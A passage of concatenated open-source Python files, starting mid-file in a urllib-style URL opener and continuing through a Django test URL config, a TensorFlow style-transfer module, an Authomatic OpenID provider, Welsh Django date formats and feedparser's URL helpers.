meth_name = 'http_error_%s' % proto
http_err = 1
orig_args = args
else:
dict = self.handle_error
meth_name = proto + '_error'
http_err = 0
args = (dict, proto, meth_name) + args
result = apply(self._call_chain, args)
if result:
return result
if http_err:
args = (dict, 'default', 'http_error_default') + orig_args
return apply(self._call_chain, args)
BLOCK_SIZE = 1024*8
def retrieve(self, fullurl, filename=None, reporthook=None, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT,
open=open_file):
"""Returns (filename, headers).
For remote objects, the default filename will refer to a temporary
file. Temporary files are removed when the OpenerDirector.close()
method is called.
For file: URLs, at present the returned filename is None. This may
change in future.
If the actual number of bytes read is less than indicated by the
Content-Length header, raises ContentTooShortError (a URLError
subclass). The exception's .result attribute contains the (filename,
headers) that would have been returned.
"""
req = self._request(fullurl, data, False, timeout)
scheme = req.get_type()
fp = self.open(req)
try:
headers = fp.info()
if filename is None and scheme == 'file':
# XXX req.get_selector() seems broken here, return None,
# pending sanity :-/
return None, headers
#return urllib.url2pathname(req.get_selector()), headers
if filename:
tfp = open(filename, 'wb')
else:
path = _rfc3986.urlsplit(req.get_full_url())[2]
suffix = os.path.splitext(path)[1]
fd, filename = tempfile.mkstemp(suffix)
self._tempfiles.append(filename)
tfp = os.fdopen(fd, 'wb')
try:
result = filename, headers
bs = self.BLOCK_SIZE
size = -1
read = 0
blocknum = 0
if reporthook:
if "content-length" in headers:
size = int(headers["Content-Length"])
reporthook(blocknum, bs, size)
while 1:
block = fp.read(bs)
if block == "":
break
read += len(block)
tfp.write(block)
blocknum += 1
if reporthook:
reporthook(blocknum, bs, size)
finally:
tfp.close()
finally:
fp.close()
# raise exception if actual size does not match content-length header
if size >= 0 and read < size:
raise ContentTooShortError(
"retrieval incomplete: "
"got only %i out of %i bytes" % (read, size),
result
)
return result
def close(self):
_urllib2_fork.OpenerDirector.close(self)
# make it very obvious this object is no longer supposed to be used
self.open = self.error = self.retrieve = self.add_handler = None
if self._tempfiles:
for filename in self._tempfiles:
try:
os.unlink(filename)
except OSError:
pass
del self._tempfiles[:]
def wrapped_open(urlopen, process_response_object, fullurl, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
success = True
try:
response = urlopen(fullurl, data, timeout)
except urllib2.HTTPError, error:
success = False
if error.fp is None: # not a response
raise
response = error
if response is not None:
response = process_response_object(response)
if not success:
raise response
return response
class ResponseProcessingOpener(OpenerDirector):
def open(self, fullurl, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
def bound_open(fullurl, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
return OpenerDirector.open(self, fullurl, data, timeout)
return wrapped_open(
bound_open, self.process_response_object, fullurl, data, timeout)
def process_response_object(self, response):
return response
class SeekableResponseOpener(ResponseProcessingOpener):
def process_response_object(self, response):
return _response.seek_wrapped_response(response)
def isclass(obj):
return isinstance(obj, (types.ClassType, type))
class OpenerFactory:
"""This class's interface is quite likely to change."""
default_classes = [
# handlers
_urllib2_fork.ProxyHandler,
_urllib2_fork.UnknownHandler,
_urllib2_fork.HTTPHandler,
_urllib2_fork.HTTPDefaultErrorHandler,
_urllib2_fork.HTTPRedirectHandler,
_urllib2_fork.FTPHandler,
_urllib2_fork.FileHandler,
# processors
_urllib2_fork.HTTPCookieProcessor,
_urllib2_fork.HTTPErrorProcessor,
]
if hasattr(httplib, 'HTTPS'):
default_classes.append(_urllib2_fork.HTTPSHandler)
handlers = []
replacement_handlers = []
def __init__(self, klass=OpenerDirector):
self.klass = klass
def build_opener(self, *handlers):
"""Create an opener object from a list of handlers and processors.
The opener will use several default handlers and processors, including
support for HTTP and FTP.
If any of the handlers passed as arguments are subclasses of the
default handlers, the default handlers will not be used.
"""
opener = self.klass()
default_classes = list(self.default_classes)
skip = set()
for klass in default_classes:
for check in handlers:
if isclass(check):
if issubclass(check, klass):
skip.add(klass)
elif isinstance(check, klass):
skip.add(klass)
for klass in skip:
default_classes.remove(klass)
for klass in default_classes:
opener.add_handler(klass())
for h in handlers:
if isclass(h):
h = h()
opener.add_handler(h)
return opener
build_opener = OpenerFactory().build_opener
_opener = None
urlopen_lock = _threading.Lock()
def urlopen(url, data=None, timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
global _opener
if _opener is None:
urlopen_lock.acquire()
try:
if _opener is None:
_opener = build_opener()
finally:
urlopen_lock.release()
return _opener.open(url, data, timeout)
def urlretrieve(url, filename=None, reporthook=None, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
global _opener
if _opener is None:
urlopen_lock.acquire()
try:
if _opener is None:
_opener = build_opener()
finally:
urlopen_lock.release()
return _opener.retrieve(url, filename, reporthook, data, timeout)
def install_opener(opener):
global _opener
_opener = opener
| gpl-2.0 |
aisipos/django | tests/view_tests/generic_urls.py | 329 | 1356 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.views.generic import RedirectView
from . import views
from .models import Article, DateArticle
date_based_info_dict = {
'queryset': Article.objects.all(),
'date_field': 'date_created',
'month_format': '%m',
}
object_list_dict = {
'queryset': Article.objects.all(),
'paginate_by': 2,
}
object_list_no_paginate_by = {
'queryset': Article.objects.all(),
}
numeric_days_info_dict = dict(date_based_info_dict, day_format='%d')
date_based_datefield_info_dict = dict(date_based_info_dict, queryset=DateArticle.objects.all())
urlpatterns = [
url(r'^accounts/login/$', auth_views.login, {'template_name': 'login.html'}),
url(r'^accounts/logout/$', auth_views.logout),
# Special URLs for particular regression cases.
url('^中文/target/$', views.index_page),
]
# redirects, both temporary and permanent, with non-ASCII targets
urlpatterns += [
url('^nonascii_redirect/$', RedirectView.as_view(
url='/中文/target/', permanent=False)),
url('^permanent_nonascii_redirect/$', RedirectView.as_view(
url='/中文/target/', permanent=True)),
]
# json response
urlpatterns += [
url(r'^json/response/$', views.json_response_view),
]
| bsd-3-clause |
dariox2/CADL | session-5/libs/stylenet.py | 4 | 11350 | """Style Net w/ tests for Video Style Net.
Video Style Net requires OpenCV 3.0.0+ w/ Contrib for Python to be installed.
Creative Applications of Deep Learning w/ Tensorflow.
Kadenze, Inc.
Copyright Parag K. Mital, June 2016.
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
from . import vgg16
from . import gif
def make_4d(img):
"""Create a 4-dimensional N x H x W x C image.
Parameters
----------
img : np.ndarray
Given image as H x W x C or H x W.
Returns
-------
img : np.ndarray
N x H x W x C image.
Raises
------
ValueError
Unexpected number of dimensions.
"""
if img.ndim == 2:
img = np.expand_dims(img[np.newaxis], 3)
elif img.ndim == 3:
img = img[np.newaxis]
elif img.ndim == 4:
return img
else:
raise ValueError('Incorrect dimensions for image!')
return img
def stylize(content_img, style_img, base_img=None, saveto=None, gif_step=5,
n_iterations=100, style_weight=1.0, content_weight=1.0):
"""Stylization w/ the given content and style images.
Follows the approach in Leon Gatys et al.
Parameters
----------
content_img : np.ndarray
Image to use for finding the content features.
style_img : TYPE
Image to use for finding the style features.
base_img : None, optional
Image to use for the base content. Can be noise or an existing image.
If None, the content image will be used.
saveto : str, optional
Name of GIF image to write to, e.g. "stylization.gif"
gif_step : int, optional
Modulo of iterations to save the current stylization.
n_iterations : int, optional
Number of iterations to run for.
style_weight : float, optional
Weighting on the style features.
content_weight : float, optional
Weighting on the content features.
Returns
-------
stylization : np.ndarray
Final iteration of the stylization.
"""
# Preprocess both content and style images
content_img = make_4d(content_img)
style_img = make_4d(style_img)
if base_img is None:
base_img = content_img
else:
base_img = make_4d(base_img)
# Get Content and Style features
net = vgg16.get_vgg_model()
g = tf.Graph()
with tf.Session(graph=g) as sess:
tf.import_graph_def(net['graph_def'], name='vgg')
names = [op.name for op in g.get_operations()]
x = g.get_tensor_by_name(names[0] + ':0')
content_layer = 'vgg/conv3_2/conv3_2:0'
content_features = g.get_tensor_by_name(
content_layer).eval(feed_dict={
x: content_img,
'vgg/dropout_1/random_uniform:0': [[1.0]],
'vgg/dropout/random_uniform:0': [[1.0]]})
style_layers = ['vgg/conv1_1/conv1_1:0',
'vgg/conv2_1/conv2_1:0',
'vgg/conv3_1/conv3_1:0',
'vgg/conv4_1/conv4_1:0',
'vgg/conv5_1/conv5_1:0']
style_activations = []
for style_i in style_layers:
style_activation_i = g.get_tensor_by_name(style_i).eval(
feed_dict={
x: style_img,
'vgg/dropout_1/random_uniform:0': [[1.0]],
'vgg/dropout/random_uniform:0': [[1.0]]})
style_activations.append(style_activation_i)
style_features = []
for style_activation_i in style_activations:
s_i = np.reshape(style_activation_i,
[-1, style_activation_i.shape[-1]])
gram_matrix = np.matmul(s_i.T, s_i) / s_i.size
style_features.append(gram_matrix.astype(np.float32))
# Optimize both
g = tf.Graph()
with tf.Session(graph=g) as sess:
net_input = tf.Variable(base_img)
tf.import_graph_def(
net['graph_def'],
name='vgg',
input_map={'images:0': net_input})
content_loss = tf.nn.l2_loss((g.get_tensor_by_name(content_layer) -
content_features) /
content_features.size)
style_loss = np.float32(0.0)
for style_layer_i, style_gram_i in zip(style_layers, style_features):
layer_i = g.get_tensor_by_name(style_layer_i)
layer_shape = layer_i.get_shape().as_list()
layer_size = layer_shape[1] * layer_shape[2] * layer_shape[3]
layer_flat = tf.reshape(layer_i, [-1, layer_shape[3]])
gram_matrix = tf.matmul(
tf.transpose(layer_flat), layer_flat) / layer_size
style_loss = tf.add(
style_loss, tf.nn.l2_loss(
(gram_matrix - style_gram_i) /
np.float32(style_gram_i.size)))
loss = content_weight * content_loss + style_weight * style_loss
optimizer = tf.train.AdamOptimizer(0.01).minimize(loss)
sess.run(tf.initialize_all_variables())
imgs = []
for it_i in range(n_iterations):
_, this_loss, synth = sess.run(
[optimizer, loss, net_input],
feed_dict={
'vgg/dropout_1/random_uniform:0': np.ones(
g.get_tensor_by_name(
'vgg/dropout_1/random_uniform:0'
).get_shape().as_list()),
'vgg/dropout/random_uniform:0': np.ones(
g.get_tensor_by_name(
'vgg/dropout/random_uniform:0'
).get_shape().as_list())
})
print("iteration %d, loss: %f, range: (%f - %f)" %
(it_i, this_loss, np.min(synth), np.max(synth)), end='\r')
if it_i % gif_step == 0:
imgs.append(np.clip(synth[0], 0, 1))
if saveto is not None:
gif.build_gif(imgs, saveto=saveto)
return np.clip(synth[0], 0, 1)
def warp_img(img, dx, dy):
"""Apply the motion vectors to the given image.
Parameters
----------
img : np.ndarray
Input image to apply motion to.
dx : np.ndarray
H x W matrix defining the magnitude of the X vector
dy : np.ndarray
H x W matrix defining the magnitude of the Y vector
Returns
-------
img : np.ndarray
Image with pixels warped according to dx, dy.
"""
warped = img.copy()
for row_i in range(img.shape[0]):
for col_i in range(img.shape[1]):
dx_i = int(np.round(dx[row_i, col_i]))
dy_i = int(np.round(dy[row_i, col_i]))
sample_dx = np.clip(dx_i + col_i, 0, img.shape[0] - 1)
sample_dy = np.clip(dy_i + row_i, 0, img.shape[1] - 1)
warped[sample_dy, sample_dx, :] = img[row_i, col_i, :]
return warped
def test_video(style_img='arles.jpg', videodir='kurosawa'):
r"""Test for artistic stylization using video.
This requires the python installation of OpenCV for the Deep Flow algorithm.
If cv2 is not found, then there will be reduced "temporal coherence".
Unfortunately, installing opencv for python3 is not the easiest thing to do.
OSX users can install this using:
$ brew install opencv --with-python3 --with-contrib
then will have to symlink the libraries. I think you can do this w/:
$ brew link --force opencv3
But the problems start to arise depending on which python you have
installed, and it is always a mess w/ homebrew. Sorry!
Your best bet is installing from source. Something along
these lines should get you there:
$ cd ~
$ git clone https://github.com/Itseez/opencv.git
$ cd opencv
$ git checkout 3.1.0
$ cd ~
$ git clone https://github.com/Itseez/opencv_contrib.git
$ cd opencv_contrib
$ git checkout 3.1.0
$ cd ~/opencv
$ mkdir build
$ cd build
$ cmake -D CMAKE_BUILD_TYPE=RELEASE \
-D CMAKE_INSTALL_PREFIX=/usr/local \
-D INSTALL_C_EXAMPLES=OFF \
-D INSTALL_PYTHON_EXAMPLES=OFF \
-D OPENCV_EXTRA_MODULES_PATH=~/opencv_contrib/modules \
-D BUILD_EXAMPLES=OFF ..
Parameters
----------
style_img : str, optional
Location to style image
videodir : str, optional
Location to directory containing images of each frame to stylize.
Returns
-------
imgs : list of np.ndarray
Stylized images for each frame.
"""
has_cv2 = True
try:
import cv2
has_cv2 = True
optflow = cv2.optflow.createOptFlow_DeepFlow()
except ImportError:
has_cv2 = False
style_img = plt.imread(style_img)
content_files = [os.path.join(videodir, f)
for f in os.listdir(videodir) if f.endswith('.png')]
content_img = plt.imread(content_files[0])
from scipy.misc import imresize
style_img = imresize(style_img, (448, 448)).astype(np.float32) / 255.0
content_img = imresize(content_img, (448, 448)).astype(np.float32) / 255.0
if has_cv2:
prev_lum = cv2.cvtColor(content_img, cv2.COLOR_RGB2HSV)[:, :, 2]
else:
prev_lum = (content_img[..., 0] * 0.3 +
content_img[..., 1] * 0.59 +
content_img[..., 2] * 0.11)
imgs = []
stylized = stylize(content_img, style_img, content_weight=5.0,
style_weight=0.5, n_iterations=50)
plt.imsave(fname=content_files[0] + 'stylized.png', arr=stylized)
imgs.append(stylized)
for f in content_files[1:]:
content_img = plt.imread(f)
content_img = imresize(content_img, (448, 448)).astype(np.float32) / 255.0
if has_cv2:
lum = cv2.cvtColor(content_img, cv2.COLOR_RGB2HSV)[:, :, 2]
flow = optflow.calc(prev_lum, lum, None)
warped = warp_img(stylized, flow[..., 0], flow[..., 1])
stylized = stylize(content_img, style_img, content_weight=5.0,
style_weight=0.5, base_img=warped, n_iterations=50)
else:
lum = (content_img[..., 0] * 0.3 +
content_img[..., 1] * 0.59 +
content_img[..., 2] * 0.11)
stylized = stylize(content_img, style_img, content_weight=5.0,
style_weight=0.5, base_img=None, n_iterations=50)
imgs.append(stylized)
plt.imsave(fname=f + 'stylized.png', arr=stylized)
prev_lum = lum
return imgs
def test():
"""Test for artistic stylization."""
from six.moves import urllib
f = ('https://upload.wikimedia.org/wikipedia/commons/thumb/5/54/' +
'Claude_Monet%2C_Impression%2C_soleil_levant.jpg/617px-Claude_Monet' +
'%2C_Impression%2C_soleil_levant.jpg?download')
filepath, _ = urllib.request.urlretrieve(f, f.split('/')[-1], None)
style = plt.imread(filepath)
f = ('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ae/' +
'El_jard%C3%ADn_de_las_Delicias%2C_de_El_Bosco.jpg/640px-El_jard' +
'%C3%ADn_de_las_Delicias%2C_de_El_Bosco.jpg')
filepath, _ = urllib.request.urlretrieve(f, f.split('/')[-1], None)
content = plt.imread(filepath)
stylize(content, style)
if __name__ == '__main__':
test_video()
| apache-2.0 |
liorshahverdi/authomatic | authomatic/providers/openid.py | 14 | 17332 | # -*- coding: utf-8 -*-
"""
|openid| Providers
----------------------------------
Providers which implement the |openid|_ protocol based on the
`python-openid`_ library.
.. warning::
This providers are dependent on the |pyopenid|_ package.
.. autosummary::
OpenID
Yahoo
Google
"""
# We need absolute import to import from openid library which has the same name as this module
from __future__ import absolute_import
import datetime
import json
import logging
import pickle
import time
from openid import oidutil
from openid.consumer import consumer
from openid.extensions import ax, pape, sreg
from openid.association import Association
from openid.yadis.manager import YadisServiceManager
from openid.consumer.discover import OpenIDServiceEndpoint
from authomatic import providers
from authomatic.exceptions import FailureError, CancellationError, OpenIDError
__all__ = ['OpenID', 'Yahoo', 'Google']
# Suppress openid logging.
oidutil.log = lambda message, level=0: None
REALM_HTML = \
"""
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-XRDS-Location" content="{xrds_location}" />
</head>
<body>{body}</body>
</html>
"""
XRDS_XML = \
"""
<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS
xmlns:xrds="xri://$xrds"
xmlns:openid="http://openid.net/xmlns/1.0"
xmlns="xri://$xrd*($v*2.0)">
<XRD>
<Service priority="1">
<Type>http://specs.openid.net/auth/2.0/return_to</Type>
<URI>{return_to}</URI>
</Service>
</XRD>
</xrds:XRDS>
"""
class SessionOpenIDStore(object):
"""
A very primitive session-based implementation of the
:class:`openid.store.interface.OpenIDStore` interface of the
`python-openid`_ library.
.. warning::
Nonces get verified only by their timeout. Use on your own risk!
"""
_log = lambda level, message: None
ASSOCIATION_KEY = ('authomatic.providers.openid.SessionOpenIDStore:'
'association')
def __init__(self, session, nonce_timeout=None):
"""
:param int nonce_timeout:
Nonces older than this in seconds will be considered expired.
Default is 600.
"""
self.session = session
self.nonce_timeout = nonce_timeout or 600
def storeAssociation(self, server_url, association):
self._log(logging.DEBUG,
'SessionOpenIDStore: Storing association to session.')
serialized = association.serialize()
decoded = serialized.decode('latin-1')
assoc = decoded
# assoc = serialized
# Always store only one association as a tuple.
self.session[self.ASSOCIATION_KEY] = (server_url, association.handle,
assoc)
def getAssociation(self, server_url, handle=None):
# Try to get association.
assoc = self.session.get(self.ASSOCIATION_KEY)
if assoc and assoc[0] == server_url:
# If found deserialize and return it.
self._log(logging.DEBUG, u'SessionOpenIDStore: Association found.')
return Association.deserialize(assoc[2].encode('latin-1'))
else:
self._log(logging.DEBUG,
u'SessionOpenIDStore: Association not found.')
def removeAssociation(self, server_url, handle):
# Just inform the caller that it's gone.
True
def useNonce(self, server_url, timestamp, salt):
# Evaluate expired nonces as false.
age = int(time.time()) - int(timestamp)
if age < self.nonce_timeout:
return True
else:
self._log(logging.ERROR, u'SessionOpenIDStore: Expired nonce!')
return False
class OpenID(providers.AuthenticationProvider):
"""
|openid|_ provider based on the `python-openid`_ library.
"""
AX = ['http://axschema.org/contact/email',
'http://schema.openid.net/contact/email',
'http://axschema.org/namePerson',
'http://openid.net/schema/namePerson/first',
'http://openid.net/schema/namePerson/last',
'http://openid.net/schema/gender',
'http://openid.net/schema/language/pref',
'http://openid.net/schema/contact/web/default',
'http://openid.net/schema/media/image',
'http://openid.net/schema/timezone']
AX_REQUIRED = ['http://schema.openid.net/contact/email']
SREG = ['nickname',
'email',
'fullname',
'dob',
'gender',
'postcode',
'country',
'language',
'timezone']
PAPE = ['http://schemas.openid.net/pape/policies/2007/06/multi-factor-physical',
'http://schemas.openid.net/pape/policies/2007/06/multi-factor',
'http://schemas.openid.net/pape/policies/2007/06/phishing-resistant']
def __init__(self, *args, **kwargs):
"""
Accepts additional keyword arguments:
:param store:
Any object which implements :class:`openid.store.interface.OpenIDStore`
of the `python-openid`_ library.
:param bool use_realm:
Whether to use `OpenID realm <http://openid.net/specs/openid-authentication-2_0-12.html#realms>`_.
If ``True`` the realm HTML document will be accessible at
``{current url}?{realm_param}={realm_param}``
e.g. ``http://example.com/path?realm=realm``.
:param str realm_body:
Contents of the HTML body tag of the realm.
:param str realm_param:
Name of the query parameter to be used to serve the realm.
:param str xrds_param:
The name of the query parameter to be used to serve the
`XRDS document <http://openid.net/specs/openid-authentication-2_0-12.html#XRDS_Sample>`_.
:param list sreg:
List of strings of optional
`SREG <http://openid.net/specs/openid-simple-registration-extension-1_0.html>`_ fields.
Default = :attr:`OpenID.SREG`.
:param list sreg_required:
List of strings of required
`SREG <http://openid.net/specs/openid-simple-registration-extension-1_0.html>`_ fields.
Default = ``[]``.
:param list ax:
List of strings of optional
`AX <http://openid.net/specs/openid-attribute-exchange-1_0.html>`_ schemas.
Default = :attr:`OpenID.AX`.
:param list ax_required:
List of strings of required
`AX <http://openid.net/specs/openid-attribute-exchange-1_0.html>`_ schemas.
Default = :attr:`OpenID.AX_REQUIRED`.
:param list pape:
of requested
`PAPE <http://openid.net/specs/openid-provider-authentication-policy-extension-1_0.html>`_
policies.
Default = :attr:`OpenID.PAPE`.
As well as those inherited from :class:`.AuthenticationProvider` constructor.
"""
super(OpenID, self).__init__(*args, **kwargs)
# Allow for other openid store implementations.
self.store = self._kwarg(kwargs, 'store', SessionOpenIDStore(self.session))
# Realm
self.use_realm = self._kwarg(kwargs, 'use_realm', True)
self.realm_body = self._kwarg(kwargs, 'realm_body', '')
self.realm_param = self._kwarg(kwargs, 'realm_param', 'realm')
self.xrds_param = self._kwarg(kwargs, 'xrds_param', 'xrds')
#SREG
self.sreg = self._kwarg(kwargs, 'sreg', self.SREG)
self.sreg_required = self._kwarg(kwargs, 'sreg_required', [])
# AX
self.ax = self._kwarg(kwargs, 'ax', self.AX)
self.ax_required = self._kwarg(kwargs, 'ax_required', self.AX_REQUIRED)
# add required schemas to schemas if not already there
for i in self.ax_required:
if i not in self.ax:
self.ax.append(i)
# PAPE
self.pape = self._kwarg(kwargs, 'pape', self.PAPE)
@staticmethod
def _x_user_parser(user, data):
user.first_name = data.get('ax', {}).get('http://openid.net/schema/namePerson/first')
user.last_name = data.get('ax', {}).get('http://openid.net/schema/namePerson/last')
user.id = data.get('guid')
user.link = data.get('ax', {}).get('http://openid.net/schema/contact/web/default')
user.picture = data.get('ax', {}).get('http://openid.net/schema/media/image')
user.nickname = data.get('sreg', {}).get('nickname')
user.country = data.get('sreg', {}).get('country')
user.postal_code = data.get('sreg', {}).get('postcode')
user.name = data.get('sreg', {}).get('fullname') or \
data.get('ax', {}).get('http://axschema.org/namePerson')
user.gender = data.get('sreg', {}).get('gender') or \
data.get('ax', {}).get('http://openid.net/schema/gender')
user.locale = data.get('sreg', {}).get('language') or \
data.get('ax', {}).get('http://openid.net/schema/language/pref')
user.timezone = data.get('sreg', {}).get('timezone') or \
data.get('ax', {}).get('http://openid.net/schema/timezone')
user.email = data.get('sreg', {}).get('email') or \
data.get('ax', {}).get('http://axschema.org/contact/email') or \
data.get('ax', {}).get('http://schema.openid.net/contact/email')
user.birth_date = datetime.datetime.strptime(data.get('sreg', {}).get('dob'), '%Y-%m-%d') if \
data.get('sreg', {}).get('dob') else None
return user
@providers.login_decorator
def login(self):
# Instantiate consumer
self.store._log = self._log
oi_consumer = consumer.Consumer(self.session, self.store)
# handle realm and XRDS if there is only one query parameter
if self.use_realm and len(self.params) == 1:
realm_request = self.params.get(self.realm_param)
xrds_request = self.params.get(self.xrds_param)
else:
realm_request = None
xrds_request = None
# determine type of request
if realm_request:
#===================================================================
# Realm HTML
#===================================================================
self._log(logging.INFO, u'Writing OpenID realm HTML to the response.')
xrds_location = '{u}?{x}={x}'.format(u=self.url, x=self.xrds_param)
self.write(REALM_HTML.format(xrds_location=xrds_location, body=self.realm_body))
elif xrds_request:
#===================================================================
# XRDS XML
#===================================================================
self._log(logging.INFO, u'Writing XRDS XML document to the response.')
self.set_header('Content-Type', 'application/xrds+xml')
self.write(XRDS_XML.format(return_to=self.url))
elif self.params.get('openid.mode'):
#===================================================================
# Phase 2 after redirect
#===================================================================
self._log(logging.INFO, u'Continuing OpenID authentication procedure after redirect.')
# complete the authentication process
response = oi_consumer.complete(self.params, self.url)
# on success
if response.status == consumer.SUCCESS:
data = {}
# get user ID
data['guid'] = response.getDisplayIdentifier()
self._log(logging.INFO, u'Authentication successful.')
# get user data from AX response
ax_response = ax.FetchResponse.fromSuccessResponse(response)
if ax_response and ax_response.data:
self._log(logging.INFO, u'Got AX data.')
ax_data = {}
# convert iterable values to their first item
for k, v in ax_response.data.items():
if v and type(v) in (list, tuple):
ax_data[k] = v[0]
data['ax'] = ax_data
# get user data from SREG response
sreg_response = sreg.SRegResponse.fromSuccessResponse(response)
if sreg_response and sreg_response.data:
self._log(logging.INFO, u'Got SREG data.')
data['sreg'] = sreg_response.data
# get data from PAPE response
pape_response = pape.Response.fromSuccessResponse(response)
if pape_response and pape_response.auth_policies:
self._log(logging.INFO, u'Got PAPE data.')
data['pape'] = pape_response.auth_policies
# create user
self._update_or_create_user(data)
#===============================================================
# We're done!
#===============================================================
elif response.status == consumer.CANCEL:
raise CancellationError(u'User cancelled the verification of ID "{0}"!'.format(response.getDisplayIdentifier()))
elif response.status == consumer.FAILURE:
raise FailureError(response.message)
elif self.identifier: # As set in AuthenticationProvider.__init__
#===================================================================
# Phase 1 before redirect
#===================================================================
self._log(logging.INFO, u'Starting OpenID authentication procedure.')
# get AuthRequest object
try:
auth_request = oi_consumer.begin(self.identifier)
except consumer.DiscoveryFailure as e:
raise FailureError(u'Discovery failed for identifier {0}!'.format(self.identifier),
url=self.identifier,
original_message=e.message)
self._log(logging.INFO, u'Service discovery for identifier {0} successful.'.format(self.identifier))
# add SREG extension
# we need to remove required fields from optional fields because addExtension then raises an error
self.sreg = [i for i in self.sreg if i not in self.sreg_required]
auth_request.addExtension(sreg.SRegRequest(optional=self.sreg,
required=self.sreg_required))
# add AX extension
ax_request = ax.FetchRequest()
# set AX schemas
for i in self.ax:
required = i in self.ax_required
ax_request.add(ax.AttrInfo(i, required=required))
auth_request.addExtension(ax_request)
# add PAPE extension
auth_request.addExtension(pape.Request(self.pape))
# prepare realm and return_to URLs
if self.use_realm:
realm = return_to = '{u}?{r}={r}'.format(u=self.url, r=self.realm_param)
else:
realm = return_to = self.url
url = auth_request.redirectURL(realm, return_to)
if auth_request.shouldSendRedirect():
# can be redirected
url = auth_request.redirectURL(realm, return_to)
self._log(logging.INFO, u'Redirecting user to {0}.'.format(url))
self.redirect(url)
else:
# must be sent as POST
# this writes a html post form with auto-submit
self._log(logging.INFO, u'Writing an auto-submit HTML form to the response.')
form = auth_request.htmlMarkup(realm, return_to, False, dict(id='openid_form'))
self.write(form)
else:
raise OpenIDError('No identifier specified!')
class Yahoo(OpenID):
"""
Yahoo :class:`.OpenID` provider with the :attr:`.identifier` predefined to ``"me.yahoo.com"``.
"""
identifier = 'me.yahoo.com'
class Google(OpenID):
"""
Google :class:`.OpenID` provider with the :attr:`.identifier` predefined to ``"https://www.google.com/accounts/o8/id"``.
"""
identifier = 'https://www.google.com/accounts/o8/id'
| mit |
hydrospanner/DForurm | DForurm/env/Lib/site-packages/django/conf/locale/cy/formats.py | 504 | 1822 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '25 Hydref 2006'
TIME_FORMAT = 'P' # '2:30 y.b.'
DATETIME_FORMAT = 'j F Y, P' # '25 Hydref 2006, 2:30 y.b.'
YEAR_MONTH_FORMAT = 'F Y' # 'Hydref 2006'
MONTH_DAY_FORMAT = 'j F' # '25 Hydref'
SHORT_DATE_FORMAT = 'd/m/Y' # '25/10/2006'
SHORT_DATETIME_FORMAT = 'd/m/Y P' # '25/10/2006 2:30 y.b.'
FIRST_DAY_OF_WEEK = 1 # 'Dydd Llun'
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
]
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
'%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
'%d/%m/%y %H:%M', # '25/10/06 14:30'
'%d/%m/%y', # '25/10/06'
]
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
| mit |
CristianBB/SickRage | lib/feedparser/urls.py | 43 | 4592 | from __future__ import absolute_import, unicode_literals
import re
try:
import urllib.parse as urlparse
except ImportError:
import urlparse as urlparse
from .html import _BaseHTMLProcessor
# If you want feedparser to allow all URL schemes, set this to ()
# List culled from Python's urlparse documentation at:
# http://docs.python.org/library/urlparse.html
# as well as from "URI scheme" at Wikipedia:
# https://secure.wikimedia.org/wikipedia/en/wiki/URI_scheme
# Many more will likely need to be added!
ACCEPTABLE_URI_SCHEMES = (
'file', 'ftp', 'gopher', 'h323', 'hdl', 'http', 'https', 'imap', 'magnet',
'mailto', 'mms', 'news', 'nntp', 'prospero', 'rsync', 'rtsp', 'rtspu',
'sftp', 'shttp', 'sip', 'sips', 'snews', 'svn', 'svn+ssh', 'telnet',
'wais',
# Additional common-but-unofficial schemes
'aim', 'callto', 'cvs', 'facetime', 'feed', 'git', 'gtalk', 'irc', 'ircs',
'irc6', 'itms', 'mms', 'msnim', 'skype', 'ssh', 'smb', 'svn', 'ymsg',
)
#ACCEPTABLE_URI_SCHEMES = ()
_urifixer = re.compile('^([A-Za-z][A-Za-z0-9+-.]*://)(/*)(.*?)')
def _urljoin(base, uri):
uri = _urifixer.sub(r'\1\3', uri)
try:
uri = urlparse.urljoin(base, uri)
except ValueError:
uri = ''
return uri
def _convert_to_idn(url):
"""Convert a URL to IDN notation"""
# this function should only be called with a unicode string
# strategy: if the host cannot be encoded in ascii, then
# it'll be necessary to encode it in idn form
parts = list(urlparse.urlsplit(url))
try:
parts[1].encode('ascii')
except UnicodeEncodeError:
# the url needs to be converted to idn notation
host = parts[1].rsplit(':', 1)
newhost = []
port = ''
if len(host) == 2:
port = host.pop()
for h in host[0].split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
if port:
parts[1] += ':' + port
return urlparse.urlunsplit(parts)
else:
return url
def _makeSafeAbsoluteURI(base, rel=None):
# bail if ACCEPTABLE_URI_SCHEMES is empty
if not ACCEPTABLE_URI_SCHEMES:
return _urljoin(base, rel or '')
if not base:
return rel or ''
if not rel:
try:
scheme = urlparse.urlparse(base)[0]
except ValueError:
return ''
